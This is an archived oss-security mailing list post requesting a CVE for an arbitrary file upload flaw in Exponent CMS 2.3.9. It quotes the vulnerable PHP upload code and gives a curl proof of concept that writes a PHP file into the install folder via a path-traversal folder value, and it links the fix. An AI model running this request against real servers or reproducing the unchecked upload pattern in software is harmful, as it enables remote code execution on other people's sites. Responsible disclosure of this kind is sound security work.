Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAEiFw0UvtbGuJ-M_zR0M+BtrEMn_tg7J3KZs+huS25imOSTNkg@mail.gmail.com>
Date: Wed, 21 Sep 2016 08:10:39 +0800
From: Carl Peng <felixk3y@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE request:Exponent CMS 2.3.9 Arbitrary File Upload vulnerability in expFile.php

Hi, I reported the following Arbitrary File Upload vulnerability to the
ExponentCMS team on Sep 13, 2016:
vulnerability:
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/file/controllers/fileController.php#L570-L592
```
if (!empty($this->params['folder']) || (defined('QUICK_UPLOAD_FOLDER') &&
QUICK_UPLOAD_FOLDER != '' && QUICK_UPLOAD_FOLDER != 0)) {
            // prevent attempt to place file somewhere other than /files
folder
            if (!empty($this->params['folder']) &&
strpos($this->params['folder'], '..') !== false) {
                $ar = new expAjaxReply(300, gt("File was not uploaded!"));
                $ar->send();
            }
            if (SITE_FILE_MANAGER == 'picker') {
                $quikFolder = !empty($this->params['folder']) ?
$this->params['folder'] :QUICK_UPLOAD_FOLDER;
                $destDir = null;
            } elseif (SITE_FILE_MANAGER == 'elfinder') {
                $quikFolder = null;
                $destDir = UPLOAD_DIRECTORY_RELATIVE .
(!empty($this->params['folder']) ? $this->params['folder']
:QUICK_UPLOAD_FOLDER) . '/';
                // create folder if non-existant
                expFile::makeDirectory($destDir);
            }
        } else {
            $quikFolder = null;
            $destDir = null;
        }
        //extensive suitability check before doing anything with the file...
        if (isset($_SERVER['HTTP_X_FILE_NAME'])) {  //HTML5 XHR upload
            $file =
expFile::fileXHRUpload($_SERVER['HTTP_X_FILE_NAME'],false,false,null,$destDir,intval(QUICK_UPLOAD_WIDTH));
 //here File Upload vulnerability
            $file->poster = $user->id;
```
the "folder"  and "$_SERVER['HTTP_X_FILE_NAME']", the two parameters may be
submitted by the user

expFile::fileXHRUpload():
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/file/models/expFile.php#L526
```
$_destFile = ($_destFile == null) ? self::fixName($fileName) : $_destFile;
//"fileName" parameter may be submitted by the user
//...
$maxwidth = intval($_max_width);
if (!empty($maxwidth)) {
..///
} else {
    file_put_contents($_destFullPath, file_get_contents('php://input',
'r')); // line 572
}

Proof of concept:
curl -H "X-File-Name: e.php" -d
"controller=file&action=quickUpload&code=<?php
phpinfo();?>&folder=../install" http://www.exponentcms.org/index.php

http://www.exponentcms.org/install/e.php


And Now, This  vulnerability have been fixed.
https://exponentcms.lighthouseapp.com/projects/61783/changesets/355702a9835cf527796c9d469a82258b7639148a
https://github.com/exponentcms/exponent-cms/commit/355702a9835cf527796c9d469a82258b7639148a

This issue was reported by Peng Hua of silence.com.cn Inc. and I would like
to request a CVE for this issue (if not done so).

Thank you.
---------------------------------http://www.silence.com.cn
penghua#silence.com.cn
PKAV Team

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.